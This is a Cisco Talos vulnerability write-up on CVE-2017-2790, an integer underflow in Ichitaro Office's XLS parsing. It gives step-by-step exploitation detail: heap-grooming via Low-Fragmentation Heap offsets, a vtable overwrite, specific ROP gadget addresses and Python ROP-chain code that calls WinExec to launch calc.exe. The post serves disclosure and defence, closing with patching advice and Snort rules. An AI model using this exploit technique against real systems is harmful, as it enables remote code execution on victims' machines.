This vulnerability was discovered by Cory Duplantis and another member of Cisco Talos


Overview
Vulnerabilities in word processing and office productivity suites are useful targets for exploitation by threat actors. Users frequently encounter file types used by these software suites in their day to day lives and may not question opening such files within an email or being prompted to download such a file from a website.

Some word processing software is widely used within communities using a specific language, but poorly known elsewhere. For example, Hancom's Hangul Word Processor is widely used within South Korea and Ichitaro Office suite from JustSystems is widely used in Japan and Japanese speaking communities. Exploiting vulnerabilities in these and similar word processing systems allows attackers to target their attacks to a specific country or to the linguistic community of their intended victims. Presumably, attackers may believe that exploits against these systems may be less likely to be discovered by security researchers who may lack the necessary software which the vulnerability exploits.

The recent discovery by Talos of a sophisticated attack exploiting Hangul Word Processor /korean-maldoc underlines the ability of attackers with the necessary technical skills to create malicious files that target local office productivity suite software.

Talos has discovered three vulnerabilities within the Ichitaro Office suite, one of the most popular word processors used in Japan.

We have no indication that any of the three vulnerabilities we discovered in Ichitaro Office suite, have been exploited in the wild. Nevertheless, all three lead to a state where arbitrary code can be executed. We have chosen one of these vulnerabilities to explain in more detail how such a vulnerability may be exploited and to demonstrate what remote code execution means by launching calc.exe as an example.

The advisory for this particular vulnerability can be found here http://www.talosintelligence.com/reports/TALOS-2016-0197

Deep Dive - TALOS-2016-0197 (CVE-2017-2790) - JustSystems Ichitaro Office Excel File Code Execution Vulnerability
This vulnerability revolves around an unchecked integer underflow of the size of a record of type 0x3c within a Workbook stream in an XLS file handled by Ichitaro.

While reading a Continue record (type 0x3c), the application calculates the number of bytes it needs to copy into memory. This calculation involves subtracting one from a value read from the file itself causing an integer underflow.

JCXCALC!JCXCCALC_Jsfc_ExConvert+0xa4b1e:
44b48cda 8b461e          mov     eax,dword ptr [esi+1Eh] // File data from Continue Record
44b48cdd 668b4802        mov     cx,word ptr [eax+2]     // Size from file (in our case 0)
...
44b48ce4 6649            dec     cx                      // Underflow the 0 to be 0xffff
...
44b48ce8 894d08          mov     dword ptr [ebp+8],ecx   // Store the 0xffff for later use

Later in the same function, this underflowed value is passed to the function handling the copying of file data.

JCXCALC!JCXCCALC_Jsfc_ExConvert+0xa4b46:
44b48d04 0fb75508        movzx   edx,word ptr [ebp+8]   // Store 0xffff into edx
...
44b48d1f 52              push    edx                    // Push size
44b48d20 51              push    ecx                    // Push destination address 
44b48d21 83c005          add     eax,5
44b48d24 52              push    edx                    // Push size
44b48d25 50              push    eax                    // Push source address
44b48d26 e8c5f7ffff      call    JCXCALC!JCXCCALC_Jsfc_ExConvert+0xa4334 (44b484f0)


The main copy function does have a check to ensure that the size is greater than zero. The underflow value flies under the radar though and passes all checks. Below is the copy function commented with relevant variable names. Note, due to the same register being pushed in the above assembly, both size and size_ in the below C code are equivalent.

int JCXCALC!JCXCCALC_Jsfc_ExConvert+0xa4334(int src, int size, int dst, int size_)
{
  int result; 
  result = 0;
  if ( !size_ )
    return size;
  if ( size > size_ )
    return 0;
  if ( size > 0 )
  {
    result = size;
    do
    {
      *dst = *src++;
      ++dst;
      --size;
    }
    while ( size );
  }
  return result;
}

The dst address is an allocation with a size also from the file of the surrounding TxO record (type 0x1b6). This size is multiplied by 2 before being passed to a malloc.

JCXCALC!JCXCCALC_Jsfc_ExConvert+0xa4a1c:
442c8bd8 668b470e        mov     ax,word ptr [edi+0Eh] // Size from TxO element
442c8bdc 50              push    eax
442c8bdd e88b87f6ff      call    JCXCALC!JCXCCALC_Jsfc_ExConvert+0xd1b1 (4423136d)
JCXCALC!JCXCCALC_Jsfc_ExConvert+0xd1b1:
4423136d 0fb7442404      movzx   eax,word ptr [esp+4]
44231372 d1e0            shl     eax,1     // Attacker size * 2
44231374 50              push    eax
44231375 ff1580d42f44    call    ds:malloc // Controlled malloc
4423137b 59              pop     ecx
4423137c c3              ret

To recap, the vulnerability gives the following constructs to an attacker:

* Memory allocation of a controlled value multiplied by 2
* memcpy into the allocation of size 0xffff from attacker controlled file data

Overwrite target
If we wanted to exploit this vulnerability on Windows 7, the question is now, what is a good target to overwrite using the memcpy? One avenue could be attempting to overwrite the vtable of an object using virtual methods and so that way we can control the program counter using a user controlled pointer.

In order for this to be feasible, our object needs to be created with the following parameters:

* Object must be allocated with a predictable size into the heap's arena
* Object must be using virtual methods and have a virtual method table (vtable).
* Object must be destroyed after the overwrite happens.

An XLS file is composed of multiple document streams, where each stream is separated into different records. Each record can be described as a Type-Length-Value (TLV) structure. This means that each record will specify its type in the first few bytes, followed by the length of the record, followed by the number of bytes specified in the size describing the data which is contained within the record.

A small diagram is shown below:

+------+--------+------------+
| Type | Length | Value      |
+------+--------+------------+
struct Record {
    uint16_t type;
    uint16_t length;
    byte[length] value;
}

As an example, a record of type 0x3c that will contain the value of 0xdeadbeef would look like the following (length is 4 due to 0xdeadbeef being 4 bytes).

+--------+--------+------------+
|Type    | Len    | Value      |
+--------+--------+------------+
| 0x003c | 0x0004 | 0xdeadbeef |
+--------+--------+------------+
<class excel.RecordGeneral>
[0] <instance uint2 'type'> +0x003c (60)
[2] <instance uint2 'length'> +0x0004 (4)
[4] <instance Continue 'data'> "\xad\xde\xeb\xfe"

The parser would then iterate through all the records in the stream and then parse each record based on the type and value described by the record. Due to our third constraint for our target record, we want a type that creates some object with a vtable during parsing, but doesn't free that object until some point after parsing the entire stream.

After research into the various types of records that the application is able to parse, it was discovered that the Row record has the following properties:

* Allocates a data structure of size 0x14
* This element's object does contain a vtable
* This element's object is destroyed during the parsing of the EOF record by calling its virtual destructor.

This means that an attacker could construct a file that contains a Row record, a few other specific records to precisely control memory, and then overwrite the Row record's vtable. After this, they can conclude with an EOF record which would call the vtable belonging to the Row record.

The plan at this point is to position our overwrite from the TxO record before a previously allocated Row object in order to use it to overwrite the Row object's vtable.

In order to position the attacker controlled element before the Row record, an abuse of the Windows 7 Low-Framentation Heap needs to be performed. A simplified explanation is described below.

Low-Fragmentation Heap
Windows 7 organizes its heap relative to the PEB and uses a combination of two allocators. One of which is the backend and the other which is the frontend. The frontend heap is an arena-based allocator known as the Low-Fragmentation Heap (LFH). This is mostly documented in Chris Valasek's paper on the Low-Fragmentation heap: http://illmatics.com/Understanding_the_LFH.pdf

An important characteristic of the LFH is that allocations are bucketed into chunks that are multiples of 8. Once a heap allocation is made, it's size is divided by 8 and then used to determine which segment to return chunks from. Once the segment is identified, a pointer within the segment will actually point to the arena that chunks of that size are returned from. This would mean that the space allocated for the Row object (0x14) would be rounded up to bucket 0x18. For bucket 0x18, there are 255 slots that are available in the arena.

Segment

   
+-------+-------+--------------------------------+-----------+-------+
|  ...  | Arena | AggregateExchg.FreeEntryOffset | BlockSize |  ...  |
+-------+-------+--------------------------------+-----------+-------+
 Arena
+-----------------+-----+-----------+---------+---------+------------+
| Segment Pointer | ... | Signature | Block 1 | Block 2 | Block X... |
+-----------------+-----+-----------+---------+---------+------------+

Another important characteristic of the LFH is that it isn't actually used until the allocations of the target application follow a particular pattern. Until this happens, the allocator will use the backend allocator. To ensure the LFH heap is being used for a particular bucket size, the target application must make 0x12 (18) allocations of the same size. Once this is done, any allocations of that size will then be allocated using the front-end allocator. It was discovered that the Palette record is very flexible and can be used to make arbitrary allocations that are never freed. The steps to enable LFH for a bucket then are:

* Allocate 0x12 allocations of the same size using the Palette record.
* Make 255 allocations to force the allocator to allocate a new segment.
(Note: This can be consolidated into just making 255 - 0x12 allocations.)

When first allocating a segment, the platform will initialize the segment with an offset into the arena that determines the first chunk that is returned. When the arena for the segment is allocated, each chunk is pre-written with a 16-bit offset (FreeEntryOffset) that represents the offset to the next heap chunk to be returned. When an allocation is made, the 16-bit offset will be read from the beginning of the next free chunk within the arena and stored within the segment. The 16-bit offset in the chunk will then be overwritten as it is part of the allocation requested by the application.

Arena - Beginning

 
+----------------+--------------------+----------------+----------------+
| Block 1 (Busy) | Block 2 (Free)     | Block 3 (Free) | Block X (Free) |
| Data: ...      | FreeEntryOffset: 3 | FEO: 4         | FEO: X+1       |
+----------------+--------------------+----------------+----------------+

This way when another allocation is made, the allocator will set the FreeEntryOffset in the segment with the one in the chunk that is being allocated so that during the next allocation it will know the next chunk to return. When allocating a chunk, an atomic swap operation is performed between the offset in the chunk to be returned and the offset that's located within the segment. This prevents concurrency issues when more than one thread is allocating from the same segment/arena.

    State 0 - Beginning
    Next slot: 3
    Offset to Block 3 currently loaded into segment
    v 
    +--------------------+--------------------+----------------------+
    | Block 3 (Free)     | Block 4 (Free)     | Block X (Free)       |
    | FreeEntryOffset: 4 | FreeEntryOffset: 5 | FreeEntryOffset: X+1 |
    +--------------------+--------------------+----------------------+
    State 1 - malloc
    Returns slot 3. Loads FreeEntryOffset from Block 3 into segment.
    Next slot: 4
                     Now offset to Block 4 is loaded into segment
                     v
    +----------------+--------------------+----------------------+
    | Block 3 (Busy) | Block 4 (Free)     | Block X (Free)       |
    | Data: ...      | FreeEntryOffset: 5 | FreeEntryOffset: X+1 |
    +----------------+--------------------+----------------------+
    State 2 - malloc
    Returns slot 4. Loads FreeEntryOffset from Block 4 into segment.
    Next slot: 5
                                      Offset to Block 5 is loaded into segment
                                      v
    +----------------+----------------+----------------------+
    | Block 3 (Busy) | Block 4 (Busy) | Block X (Free)       |
    | Data: ...      | Data: ...      | FreeEntryOffset: X+1 |
    +----------------+----------------+----------------------+<

The offsets are written into the same memory region as the chunk that is returned, so when the chunk is used by the application they will be overwritten by the data that application is storing to the chunk. Due to these offsets being cached inside the free chunks within the arena before an allocation happens, these values can be overwritten tricking the allocator into returning a chunk anywhere in the arena. The TxO record is used to overwrite the offset kept by each chunk in order to trick the allocator to return a slot of the attacker's choosing.

State 0 - Beginning
Next slot: 4

                    v
+----------------+--------------------+--------------------+
| Block 3 (Busy) | Block 4 (Free)     | Block 5 (Free)     |
|                | FreeEntryOffset: 5 | FreeEntryOffset: 6 |
+----------------+--------------------+--------------------+

State 1 - TxO Record
Returns slot 3. Loads FreeEntryOffset (4) from Block 3 into segment.
Next slot: 4
                                    v
+----------------+------------------+--------------------+
| Block 3 (Busy) | Block 4 (Busy)   | Block 5 (Free)     |
|                | Data: TxO Record | FreeEntryOffset: 6 |
+----------------+------------------+--------------------+

State 2 - TxO overwrites FreeEntryOffset
At this point, the FreeEntryOffset for the next block is overwritten with XXX.
In this example, we'll use 3 to return Block 3

                                    v
+----------------+------------------+----------------------+
| Block 3 (Busy) | Block 4 (Busy)   | Block 5 (Free)       |
|                | Data: TxO Record | FreeEntryOffset: XXX |
+                +         -------------------->           |
+----------------+------------------+----------------------+

State 3 - malloc
The allocator will return Block 5 as it was the next block.
The FreeEntryOffset in Block 5 will be loaded into the segment
for the next allocation.

If the TxO record overwrote this value with 3, this would mean Block 3
would be returned as the next chunk.

v
+----------------+------------------+----------------+
| Block 3 (Busy) | Block 4 (Busy)   | Block 5 (Busy) |
|                | Data: TxO Record | Data: ...      |
+                +         -------------------->     |
+----------------+------------------+----------------+

State 4 - malloc
Returns Block 3. The first 16-bit word inside Block 3 will also be loaded
into the segment.

+----------------+------------------+----------------+
| Block 3 (Busy) | Block 4 (Busy)   | Block 5 (Busy) |
|                | Data: TxO Record | Data: ...      |
+----------------+------------------+----------------+

This positions an attacker in an optimal situation for overwriting an object that has been allocated earlier within the process's timeline. The following steps can be used to position the TxO buffer in front of the Row object in order to overwrite its vtable.

    * Use TxO record to make an allocation of size 0x18 to be in the same arena as the Row object.
    * Overflow the TxO record to overwrite the FreeEntryOffset.
    * Allocate a Row object. This forces the overwritten FreeEntryOffset to be loaded into the segment.
    * Allocate another TxO record of the same size which will be positioned in front of the Row object.
    * Overflow the TxO record into the chunk containing the Row object in order to control its vtable.

After this occurs, parsing the last EOF record will cause the Row object's vtable to be dereferenced in order to call the destructor for the Row object.

    0:000> r

    eax=deadbeeb ebx=ffffffff ecx=045d7d88 edx=0000ffff esi=00127040 edi=00000000
    eip=3f7205c7 esp=00126fdc ebp=00127028 iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
    JCXCALC!JCXCCALC_Jsfc_ExConvert+0x9c40b:
    3f7205c7 ff5004          call    dword ptr [eax+4]    ds:0023:deadbeef=????????
    0:000> .logclose
    0:000> dc ecx
    045d7d88  deadbeeb 64646464 64646464 64646464  dddddddddddddddd
    045d7d98  64646464 64646464 64646464 64646464  dddddddddddddddd
    045d7da8  64646464 64646464 64646464 64646464  dddddddddddddddd
    045d7db8  64646464 64646464 64646464 64646464  dddddddddddddddd
    045d7dc8  64646464 64646464 64646464 64646464  dddddddddddddddd
    045d7dd8  64646464 64646464 64646464 64646464  dddddddddddddddd
    045d7de8  64646464 64646464 64646464 64646464  dddddddddddddddd
    045d7df8  64646464 64646464 64646464 64646464  dddddddddddddddd

The attacker is now controlling a called function pointer.

Code Execution
Looking at the situation at the crash, the attacker has control of a called pointer and the contents of ecx point to an attacker controlled buffer. In order to achieve code execution, a bit of ROP gadget searching must occur to search for a stack pivot. The goal is for the attacker to control EIP as well as have the stack pointing into attacker controlled data. Luckily, the following modules are in the process space and are not affected by ASLR.

 0:000> !py mona mod -cm aslr=false
--------------------------------------------------
Module info :
--------------------------------------------------
Base       || Size       | ASLR  | Modulename,Path
--------------------------------------------------
0x5f800000 || 0x000b1000 | False | [JSFC.DLL]
0x026b0000 || 0x00007000 | False | [jsvdex.dll]
0x27080000 || 0x000e1000 | False | [JSCTRL.DLL]
0x3f680000 || 0x00103000 | False | [JCXCALC.DLL]
0x22150000 || 0x00018000 | False | [JSMACROS.DLL]
0x003b0000 || 0x00008000 | False | [JSCRT40.dll]
0x61000000 || 0x0013b000 | False | [JSAPRUN.DLL]
0x3c7c0000 || 0x01611000 | False | [T26com.DLL]
0x23c60000 || 0x00024000 | False | [JSDFMT.dll]
0x03ad0000 || 0x0000b000 | False | [JSTqFTbl.dll]
0x40030000 || 0x0002c000 | False | [JSFMLE.dll]
0x21480000 || 0x00082000 | False | [jsgci.dll]
0x02430000 || 0x00008000 | False | [JSSPLEX.DLL]
0x43ab0000 || 0x003af000 | False | [T26STAT.DLL]
0x217b0000 || 0x0001b000 | False | [JSDOC.dll]
0x22380000 || 0x0007a000 | False | [JSFORM.OCX]
0x211a0000 || 0x00049000 | False | [JSTDLIB.DLL]
0x21e50000 || 0x0002c000 | False | [JSPRMN.dll]
0x02a80000 || 0x0000e000 | False | [jsvdex2.dll]
0x277a0000 || 0x00086000 | False | [jsvda.dll]
0x61200000 || 0x000c6000 | False | [JSHIVW2.dll]
0x49760000 || 0x00009000 | False | [Jsfolder.dll]
0x210f0000 || 0x000a1000 | False | [JSPRE.dll]
0x213e0000 || 0x00022000 | False | [jsmisc32.dll]

Needless to say, there are an abundance of ROP gadgets available in these modules. The only problem is the attacker can't directly call the ROP gadgets since the vtable entry is a pointer. After compiling a list of ROP gadgets, a search across all of the modules is necessary to see if any of the ROP gadget addresses appear in any of the modules, effectively looking for pointers to the found ROP gadgets. Luckily again, the following gadget emerges.

    
file:JSFC.DLL
JSFC.DLL.gadgets.40
Gadget:0x5f8170bc : sub esp, 4
                    push ebx
                    push esi
                    mov eax, dword ptr [ecx + 0xa0]
                    push edi
                    push ebp
                    mov esi, ecx
                    test eax, eax
                    je 0x5f8170ee
                    push esi
                    call eax
Simplified
file:JSFC.DLL
gadget:0x5f8170bc : mov eax, dword ptr [ecx + 0xa0] ;
                    mov esi, ecx 
                    call eax

This gadget allows pointer to be dereferenced from the attacker controlled buffer and called directly, allowing for a direct gadget to be called. As a side effect from the first gadget, esi and ecx now point to the same attacker controlled buffer. The following gadget achieves the full stack pivot.

    
JSFC.DLL.gadgets.40
gadget:0x5f83636e : or bh, bh
                    push esi
                    pop esp
                    mov eax, edi
                    pop edi
                    pop esi
                    pop ebp
                    ret 0x1c
]Simplified
file:JSFC.DLL
26051:0x5f83636e :  push esi
                    pop esp
                    ret 0x1c

The attacker now has full EIP and stack control, allowing for a proper ROP chain to be built.

    0:000> r
    eax=00000000 ebx=ffffffff ecx=04559138 edx=0000ffff esi=62626262 edi=5f86ecc8
    eip=deadbeef esp=0455926c ebp=62626262 iopl=0         nv up ei ng nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010286
    deadbeef ??              ???
    0:000> dc esp
    0455926c  61616161 61616162 61616163 61616164  aaaabaaacaaadaaa
    0455927c  61616165 61616166 61616167 61616168  eaaafaaagaaahaaa
    0455928c  61616169 6161616a 6161616b 6161616c  iaaajaaakaaalaaa
    0455929c  6161616d 6161616e 6161616f 61616170  maaanaaaoaaapaaa
    045592ac  61616171 61616172 61616173 61616174  qaaaraaasaaataaa
    045592bc  61616175 61616176 61616177 61616178  uaaavaaawaaaxaaa
    045592cc  61616179 6261617a 62616162 62616163  yaaazaabbaabcaab
    045592dc  62616164 62616165 62616166 62616167  daabeaabfaabgaab

At this point, the attacker could try to retrieve WinExec by walking the import table of one of the DLLs for an entry into ntdll. From ntdll, an offset can be retrieved into Kernel32. From Kernel32, the offset into WinExec can be retrieved and a direct command can be executed. Or...

    $ r2 -q -c 'ii~WinExec' T26COM.DLL
    ordinal=110 plt=0x3d46c47c bind=NONE type=FUNC name=KERNEL32.dll_WinExec

...WinExec could be imported by one of the DLLs already and the attacker can simply use that address instead. A simple ROP chain is compiled to drop the string calc.exe into memory and passed to the WinExec pointer.

    command = ['calc', '.exe', '\0\0\0\0']
    for i,substr in enumerate(command):
        payload += pop_ecx_ret_8                # pop ecx; ret 8
        payload += p32(writable_addr + (i*4))   # Buffer to write the command
        payload += pop_eax_ret                  # pop eax; ret
        payload += p32(0xdeadbeec)              # eaten by ret 8
        payload += p32(0xdeadbeed)              # eaten by ret 8
        payload += substr                       # Current four bytes to write
        payload += write_mem                    # mov dword [ecx], eax; xor eax, eax; ret

Once the command string is in memory, dereferencing the WinExec pointer and calling it with the buffer executes the wanted command.

    # Deref WinExec import
    payload += pop_edi_esi_ebx_ret
    payload += p32(winexec-0x64)    # pop edi (offset due to [edi + 0x64])
    payload += p32(0xdeadbeee)      # eaten by pop esi
    payload += p32(0xdeadbeef)      # eaten by pop ebx
    # Call WinExec with buffer pointing to calc.exe
    payload += deref_edi_call       # mov esi, dword [edi + 0x64]; call esi
    payload += p32(writable_addr)   # Buffer with command
    payload += p32(1)               # Display the calc (0 will hide the command output)

The exploit shown in the video below was built for Ichitaro 2016 v0.3.2612 running on Windows 7.

Conclusion
At first glance reports stating that an application does not check that a size value supplied by a specific file format is greater than zero may sound like a bug rather than a vulnerability. We hope that this post goes someway to describe how a very simple omission in program logic may be exploited by an exploit developer to create a weaponized file that can be used to execute arbitrary code on a victim's system.

The nature of vulnerabilities such as these, and their attractiveness to threat actors is why keeping systems up to date with patches is vital. This is also why Talos develops and releases detection for every vulnerability that we find before we publish the details of the vulnerability.

Talos is committed to finding software vulnerabilities before the bad guys, and working with vendors in accordance with our responsible vulnerability disclosure policy to ensure that weaponized exploits such as this do not result in system compromise.

Snort Rules: 40125 - 40126, 41703 - 41704